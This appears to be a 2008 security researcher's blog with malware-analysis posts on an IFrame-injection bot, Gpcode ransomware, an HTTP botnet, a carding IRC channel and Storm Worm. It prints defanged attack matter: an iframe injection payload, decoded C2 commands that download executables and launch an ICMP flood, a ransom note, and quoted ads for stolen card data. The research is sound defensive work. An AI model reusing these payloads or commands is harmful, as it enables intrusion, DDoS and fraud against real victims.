malware

IFrame Injection Attacks

Friday, June 13. 2008

Attacks against web servers are en vogue nowadays. This can be mass SQL injection attacks that insert malicious JavaScript into web sites or other forms of IFrame injection attacks.

Today we analyzed a malware sample that performs such IFrame injection attacks. The executable with MD5 hash e3e3eb9e00745537a17311a48ddcfd6d is detected by Kaspersky as Backdoor.Win32.Agent.fjs or by ClamAV as PUA.Packed.NPack-3. When executed, the sample creates several files on the hard disk: it drops several benign DLLs such as wpcap.dll and npptools.dll which are all related to packet processing. Furthermore, two executables 3.tmp and 6.tmp are created.

Then the file 6.tmp is executed with the command line parameter

-idx 0 -ip $IP-RANGE -port 80 -insert "< if rame sr c="hXXp://www.XXX.cn/index.htm" width=0 height=0 frameborder=0>"

The intention is that the infected machines should scan a specific network range for web servers on port 80 and then try to inject a specific IFrame into vulnerable servers.

An analysis of the injected site leads to more malware. The HTML file contains for example four more IFrames:

IF RAME sr c="hXXp://www.XXX.cn/index.files/flash.htm" frameBorder=0 width=100 scrolling=no height=1>
IF RAME sr c="hXXp://www.XXX.cn/index.files/real.htm" frameBorder=0 width=100 scrolling=no height=1>
IF RAME sr c="hXXp://www.XXX.cn/index.files/614.htm" frameBorder=0 width=100 scrolling=no height=1>
IF RAME sr c="hXXp://www.XXX.cn/web/index.htm" frameBorder=0 width=100 scrolling=no height=1>

As the names suggest, these IFrames contain exploits against well-known vulnerabilities in applications such as Flash or Real Player 11. Each of these exploits tries to install additional malware.

Posted by Thorsten Holz in malware at 16:56 | Comments (0) | Trackbacks (0)

Gpcode.ak vs. CWSandbox

Tuesday, June 10. 2008

Recently a new variant of Gpcode was detected by the researchers from Kaspersky Lab. Gpcode is a form of ransomware, a pretty nasty form of malware that is used in extortion attempts. The basic idea of such malware is to encrypt certain files on the hard disk with a key only known to the attacker and then blackmail the victim to press money.

Upon startup, Gpcode.ak searches for specific files on the disk (extensions are for example .htm, .jpg, and .inc) and encrypts them with a 1024 bit RSA key. The file extension is then replaced with $ORIGINAL._CRYPT. Once this is finished, the malware displays a pop-up with the following text:

Your files are encrypted with RSA-1024 algorithm. To recovery your files you need to buy our decryptor. To buy decrypting tool contact us at: cipher4000@yahoo.com

Furthermore, also a file named !READ_ME!.txt is created on the disk that contains the following text:

Your files are encrypted with RSA-1024 algorithm.
To recovery your files you need to buy our decryptor.
To buy decrypting tool contact us at: cipher4000@yahoo.com

=== BEGIN ===
AD7D6889
010200000168000000A400008EE1630FA688F194
42766F3AE19D5483AAE44C246F66C15F5C6D0E38
0B402EF1B67A0FF10A8A08CADB2DEA19EBD957EF
151ED9365CD730BE54263C3E2FDCEDF8546FF33E
5017032833DCB0C306EA28D79CD6DB4C0E7CE96D
3B84E83EEC84740FED2D64B672148E6F86B06B16
890102FF0D22AE42D3CD4B0F7D7E2AD0A5C0724C
=== END ===

Kasperky Labs called for aid to "Help crack Gpcode", but I doubt that cracking this key is successful. Dancho has some more info on Gpcode.ak in his blog. Furthermore, the full CWSandbox report is available.

Posted by Thorsten Holz in malware at 19:04 | Comments (0) | Trackbacks (0)

HTTP-based Botnets

Saturday, June 7. 2008

We observe more and more botnets using HTTP-based communication channels. Quite often, these bots are used for DDoS attacks as the following example explains. We recently analyzed a bot with CWSandbox (MD5: 112ccb580b0013f967b6ba991802850d) that first performs the usual steps during a bot infection, e.g., copying itself to the Windows system folder and adding registry keys such that the bot is started as a service after a reboot. The bot then issues the following (obfuscated) HTTP request:

POST /ddd/stat.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: life-tablets.xxx
Content-Length: 27
Cache-Control: no-cache

id=xMACHINENAME_0&build_id=1362B8E

The answer from the server is:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Jun 2008 19:59:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close

fc
MTA7MjAwMDsxMDsxOzA7MzA7MTAwOzM7MjA7MTAwMDsy
MDAwI2dldCBodHRwOi8vZGZ0cmVvLmNvbS9sZi9lL2kuZXhl
O2dldCBodHRwOi8vZGZ0cmVvLmNvbS9sZi9lLzEwMDAuZXh
lO2dldCBodHRwOi8vbGlmZS10YWJsZXRzLmNuL2xmL2xvY
WQuZXhlO2Zsb29kIGljbXAgbGliZXJ0eXJlc2VydmVkaXJlY3R
vcnkuY29tIzEwIw==
0

The response is base64-encoded and decoding leads to the following (obfuscated) commands:

10;2000;10;1;0;30;100;3;20;1000;2000#
get hxxp://dftreo.xxx/lf/e/i.exe;
get hxxp://dftreo.xxx/lf/e/1000.exe;
get hxxp://life-tablets.xxx/lf/load.exe;
flood icmp TARGET.COM&10;

Thus three additional malware binaries are installed on the compromised machine and the bot also starts an ICMP-based DDoS attack against the specified target.

Posted by Thorsten Holz in malware at 15:30 | Comments (3) | Trackbacks (0)

Good ol' #CCpower

Friday, June 6. 2008

A few weeks ago, one of our honeypots was hacked and the attacker installed an IRC bouncer on the machine. Nothing too spectacular, but nevertheless interesting since we can then observe how the attackers communicate with each other and what channels they use. The interesting part is that the attackers joined one of the well-known carding channels, in which credit card infos, Paypal accounts, PINs, and other stolen information is traded. Here a small excerpt, the full dump is many megabytes in size:

- DonDax SELLING Selling USA/Europe VISA/MC DUMPS ,BANKS(halifax,HSBC etc ),Fulls(PIN,DOB,SSN),Paypals(email),EGOLD, and Cvv2's(worldwide). No ripping and NO TESTS. - Hicks Cashout WESTERN UNION on UK LONDON / GREECE- ATHEENS !!! - Hicks Selling dumps+pin new ones every week and FULLS ALSO !!! - JuanesXloT Scot Epic partea ta 50% !! DE asemenea scot conturi caja madrid partea ta 50% ! Caut spammer bun sa fim parteneri am eu scamuri partea ta 50% ! Sau daca ai tu carduri care merg facute cu 1010000... si merg scoase - M3ster Daca doresti sa-ti achizitionezi un RooT de :scan / flood / pagina / emech / psybnc sau poate un remote desktop, Shell , sau poate vrei un site, Ofer Hosting, cc / paypal / spam /drone /boti , Tot ce trebuie sa - Maka` I need email list all country big file on email list like 500 mb 1-2 gb if you have prv me - d3x SELLING EU DUMPS WITH PIN [TRACK1/TRACK2+PIN] || PAYPAL ACCOUNTS WITH GOOD BALANCE [VERIFIED/UNVERIFIED] || FULLZ AND CVV2 [US/EU] || DONT WASTE MY TIME OR I WILL IGNORE YOU || FOR DEAL ICQ : 436306694 - traxpro Selling USA/Worldwide VISA/MC dumps from hotels. Natural track. Various bins are available. Offering tutorials, software and other additional info for all my clients. - traxpro Spamming for HSBC, Halifax, CIBC. e-trade bank logins. Selling UK, USA, Swedish, Australian cvvs. - Selling CVV, Checked and Verified 5$ each, E-gold and WU(for bigger orders) Accepted - Charleskj Am Nevoie De Un Php Mailer Uplodat Care Trimite Inbox , Cine Are Prv Me , Pot Oferi Multe / Need A Php Mailer Uploated That Sends Inbox , Who Have Please Prv Me , Can Offer Many Things !!!

Different people offer a diverse set of stolen credentials, which can then be abused - quite interesting to observe all the trading activity (although we can only see the advertisements and not the actual trades). Last year, Franklin et al. published a study entitled "An Inquiry into the Nature and Causes of the Wealth of Internet Miscreants". In this paper, the authors present an analysis of 13 million public IRC messages obtained from several networks and channels, collected over a 7 month period. The particular channel we observed is one of them - time for some analysis to validate their measurements...

Posted by Thorsten Holz in honeynets, malware at 00:06 | Comments (5) | Trackback (1)

Storm Worm Dead?

Tuesday, June 3. 2008

The Internet Storm Center had today a story about a "New Stormworm download site". The Storm Worm botnet is thus still live and propagating. However, the size of the botnet is decreasing significantly: Currently, only about 8.2K hosts are online within the network (based on measurement results with the crawler presented in the LEET'08 paper). Compared to the size a few months ago (40K in January, even more a few months earlier), this is a strong decrease. Will the botnet thus become obsolete in the near future?

The CWSandbox analysis of the Storm Worm sample loveyou.exe (MD5: 0679c17b9072d378cb0a39272fed98f5) shows the typical signs of a Storm sample: It first drops a file called C:\WINDOWS\farkrish.exe and also the typical peer-list:

H:\WINDOWS\farkrish.config [peers] 000011213D362D29747E07640874096F = C933DDCB2E6E00 H:\WINDOWS\farkrish.config [peers] 01006C75C1523825A27A642FD05F6859 = BDA2AF3A4A3600 H:\WINDOWS\farkrish.config [peers] 02003727703C8435FA41B70F977E6055 = 53C8003932CD00 H:\WINDOWS\farkrish.config [peers] 0300B623D3499048CC4BB30B5857C959 = C86E5D666A2C00 H:\WINDOWS\farkrish.config [peers] 04000A4C7B4BBC41AE5B6B486A00F613 = 7B11B24647B600 H:\WINDOWS\farkrish.config [peers] 05002744C35A572A932662411A117715 = 7B150612413A00 H:\WINDOWS\farkrish.config [peers] 06000772D412A4727D1B415B7A73F450 = 183C4148226F00 H:\WINDOWS\farkrish.config [peers] 07000600822E65796C39356C6E3C750E = 7B12A2E745FA00 H:\WINDOWS\farkrish.config [peers] 0800F81A9A4D644D6566FC73591C0B5F = C925ECC4375C00 H:\WINDOWS\farkrish.config [peers] 090007168A1C884C2D60D12FD900D86E = 7D19C551116E00 H:\WINDOWS\farkrish.config [peers] 0A00C95E9909F25F7844635C9D0FAD62 = BDA663FA77E400 H:\WINDOWS\farkrish.config [peers] 0B00364A9F3CC648DC1EE87E0E022E70 = 53CB22366F8D00 H:\WINDOWS\farkrish.config [peers] 0C00C65A0A69484DDF47D724A81F3B52 = A007E95F321F00 H:\WINDOWS\farkrish.config [peers] 0D00DE0895137F5AC2376814D6415F4D = 40FEB3F7645700 H:\WINDOWS\farkrish.config [peers] 0E007A157B4A305BD352D1039829B24C = 43954E9F0F4D00 H:\WINDOWS\farkrish.config [peers] 0F00042A5F72C81BD16DDB4B7A38DD14 = 3EFBBF4273AC00 H:\WINDOWS\farkrish.config [peers] 1000A535661B0414FA6556507D75880A = CBDA9AA318CD00 H:\WINDOWS\farkrish.config [peers] 1100556AD128A56385603C71BF3A3476 = 4421178C717600 H:\WINDOWS\farkrish.config [peers] 12000A1B5609B740B609833F2C11B212 = C93AE62B6AFA00 H:\WINDOWS\farkrish.config [peers] 1300907BD345E730C048E311A3705B21 = 539C8C79473500 H:\WINDOWS\farkrish.config [peers] 1400FA75B31AF97F4564B80F49060C72 = 477196302BC400 H:\WINDOWS\farkrish.config [peers] 1500D1510455D5005746601F4E4A584F = BD9C1C33213F00 [...]

Besides this, farkrish.exe is allowed to access the network and the infected machines syncs the time via NTP. The content of the UDP packets that are sent out have the same structure as always:

0000     10 a6 e6 22 f9 ca cc b0 2d a2 8c c7 de 57 ba 53

0010     5e c5 e5 a6 17 02 48 31 46

Thus it seems that there are no major changes in this new update release.

Posted by Thorsten Holz in malware at 11:59 | Comments (0) | Trackbacks (0)

IFrame Injection Attacks

Gpcode.ak vs. CWSandbox

HTTP-based Botnets

Good ol' #CCpower

Storm Worm Dead?

About

Calendar

Quicksearch

Archives

Categories

Syndicate This Blog

Creative Commons

	June '08
Mon	Tue	Wed	Thu	Fri	Sat	Sun
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18	19	20	21	22
23	24	25	26	27	28	29
30